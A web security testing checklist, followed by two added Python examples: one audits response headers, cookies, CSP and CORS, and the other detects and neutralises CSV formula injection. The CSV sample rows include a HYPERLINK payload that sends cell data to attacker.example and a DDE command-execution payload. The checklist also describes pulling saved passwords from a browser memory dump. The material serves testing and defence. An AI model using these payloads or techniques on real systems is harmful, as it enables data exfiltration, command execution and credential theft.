Webchecklist.txt
Web Checklist
Content-Type / charset (charset missing, or alternative encodings such as UTF-7 accepted)
User-Agent header injection (XSS/SQLi via logged or reflected headers)
HTTP methods (dangerous verbs enabled: PUT, DELETE, TRACE)
Host header injection / Origin header handling
Open redirection (302 request/response)
robots.txt
sitemap.xml
rate limit attack
input not sanitized
input validation
URL injection (HTML, XSS, SQL)
Security headers: CSP, HSTS, X-Frame-Options, X-XSS-Protection, X-Content-Type-Options
error handling
Information disclosure
using vulnerable components
buffer overflow
clickjacking
cookie manipulation
cookie flags
auto complete
Response manipulation
session timeout
back button refresh
captcha bypass (bruteforce)
SSL and TLS weak ciphers
Obsolete TLS Enabled
directory bruteforcing / listing
about:cache (Firefox) for cached sensitive pages
concurrent sessions
CORS
CSRF
CSV Injection
malicious File upload
Application uses cleartext traffic
Business Logic Bypass
Captcha not implemented
Captcha expiration or same captcha is used
website on HTTP
Default server page visible
Duplicate HTTP headers
HTTPS is not implemented
IDOR
Insecure permission
Internal path disclosure
Last logon date and time not displayed (finance sites)
Misconfigured CSP header
Misconfigured security headers
OTP Flooding
Password in Cleartext in Browser settings
Password return in response
Private IP addresses disclosed
URL is accessible without authentication
Rate limiting not implemented
sensitive port open
website accessible through IP
Cookie attribute not set
Misconfigured CSP header: 'unsafe-inline' / 'unsafe-eval' in script-src (potential DOM XSS)
Password in cleartext in browser settings
(Go to browser settings > saved passwords and check whether the password is shown in cleartext. Also: in Task Manager right-click the browser process and create a dump file, open the dump in a hex editor, and search for the password in it.)
Weak encoding enabled
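The following is an added example (not part of the original checklist file) that turns the header-related items above into a single offline check: missing security headers, duplicate headers, Content-Type without charset, CSP with 'unsafe-inline'/'unsafe-eval', cookie flags, CORS reflecting the request Origin with credentials, and version disclosure in the Server header. It runs against a constructed list of response headers; in practice you would feed it the raw headers copied from a proxy such as Burp. The X-XSS-Protection check is kept only because the checklist lists it; modern browsers ignore that header.

```python
"""
Offline audit of one captured HTTP response against the checklist's header,
cookie, CSP and CORS items. Example code added for this page, not from the
original file. Input is a list of (name, value) pairs so duplicates survive.
"""
import re
from collections import defaultdict

# Headers the checklist expects. X-XSS-Protection is legacy; modern browsers
# ignore it, it is listed only because the checklist names it.
EXPECTED_HEADERS = [
    "Strict-Transport-Security",
    "Content-Security-Policy",
    "X-Frame-Options",
    "X-Content-Type-Options",
    "X-XSS-Protection",
]

# Constructed sample response, not captured from any real site.
SAMPLE_HEADERS = [
    ("Content-Type", "text/html"),
    ("Set-Cookie", "session=abc123; Path=/"),
    ("Set-Cookie", "theme=dark; Path=/; Secure; HttpOnly; SameSite=Lax"),
    ("Content-Security-Policy",
     "default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval'"),
    ("X-Frame-Options", "DENY"),
    ("X-Frame-Options", "SAMEORIGIN"),
    ("Access-Control-Allow-Origin", "https://attacker.example"),
    ("Access-Control-Allow-Credentials", "true"),
    ("Server", "Apache/2.4.41 (Ubuntu)"),
]


def parse_set_cookie(value):
    """Return (cookie_name, {attribute_lower: attribute_value})."""
    parts = [p.strip() for p in value.split(";")]
    name = parts[0].split("=", 1)[0].strip()
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name, attrs


def csp_sources(csp, directive):
    """Lower-cased source list for a CSP directive, or None if absent."""
    for entry in csp.split(";"):
        tokens = entry.split()
        if tokens and tokens[0].lower() == directive:
            return [t.lower() for t in tokens[1:]]
    return None


def audit_response(headers, request_origin=None):
    """Return a list of finding strings for one response."""
    findings = []
    grouped = defaultdict(list)
    for name, value in headers:
        grouped[name.lower()].append(value)

    for name in EXPECTED_HEADERS:
        if name.lower() not in grouped:
            findings.append(f"missing header: {name}")

    # Duplicate headers (Set-Cookie legitimately repeats)
    for name, values in grouped.items():
        if name != "set-cookie" and len(values) > 1:
            findings.append(f"duplicate header: {name} ({len(values)} values)")

    content_type = grouped.get("content-type", [""])[0].lower()
    if content_type.startswith("text/html") and "charset=" not in content_type:
        findings.append("Content-Type has no charset")

    # script-src falls back to default-src when it is not given
    for csp in grouped.get("content-security-policy", []):
        scripts = csp_sources(csp, "script-src")
        if scripts is None:
            scripts = csp_sources(csp, "default-src") or []
        for keyword in ("'unsafe-inline'", "'unsafe-eval'"):
            if keyword in scripts:
                findings.append(f"CSP allows {keyword} for scripts")

    for raw in grouped.get("set-cookie", []):
        cookie, attrs = parse_set_cookie(raw)
        for flag in ("secure", "httponly", "samesite"):
            if flag not in attrs:
                findings.append(f"cookie {cookie}: {flag} not set")

    allow_origin = grouped.get("access-control-allow-origin", [None])[0]
    allow_creds = grouped.get("access-control-allow-credentials", [""])[0].lower() == "true"
    if allow_origin == "*" and allow_creds:
        findings.append("CORS: wildcard origin with credentials")
    elif allow_origin and request_origin and allow_origin == request_origin and allow_creds:
        findings.append(f"CORS: reflects Origin {request_origin} with credentials")

    for server in grouped.get("server", []):
        if re.search(r"\d+\.\d+", server):
            findings.append(f"Server header discloses version: {server}")

    return findings


if __name__ == "__main__":
    for line in audit_response(SAMPLE_HEADERS, request_origin="https://attacker.example"):
        print(line)
```

To test CORS reflection, send the request with an Origin you control and pass that same value as request_origin; a finding only appears when the server echoes it back together with Access-Control-Allow-Credentials: true.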
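For the CSV injection item, here is an added example (not from the original checklist) of both sides of the check: a detector for cells that a spreadsheet would evaluate as a formula, and the usual neutralisation of prefixing such cells with a single quote before writing them out with the csv module. The sample rows are constructed values of the kind a "display name" field might carry.

```python
"""
CSV (formula) injection check and neutralisation for exported data.
Example code added for this page, not from the original file. A cell that
starts with = + - @ or a tab/carriage return is treated as a formula by
spreadsheet software, so it is prefixed with a single quote; the csv writer
then quotes the field and doubles any embedded quotes.
"""
import csv
import io

FORMULA_PREFIXES = ("=", "+", "-", "@", "\t", "\r")


def is_formula(cell):
    """True if a spreadsheet would evaluate this cell as a formula."""
    return isinstance(cell, str) and cell.startswith(FORMULA_PREFIXES)


def neutralise(cell):
    """Prefix dangerous cells with a single quote so they render as text."""
    if is_formula(cell):
        return "'" + cell
    return cell


def export_rows(rows):
    """Write rows to CSV text with every cell neutralised."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in rows:
        writer.writerow([neutralise(c) for c in row])
    return buf.getvalue()


# Constructed sample user-supplied values (e.g. a "display name" field).
SAMPLE_ROWS = [
    ["alice", "alice@example.test"],
    ['=HYPERLINK("http://attacker.example/?"&A1,"click")', "x@example.test"],
    ["+cmd|' /C calc'!A0", "y@example.test"],
    ["-2+3", "z@example.test"],
]

if __name__ == "__main__":
    print(export_rows(SAMPLE_ROWS))
```

Note that the rule also prefixes legitimate negative numbers, so apply it to free-text columns rather than numeric ones, and test the export in the spreadsheet application actually used by the target's users, since the prefix character handling differs between products.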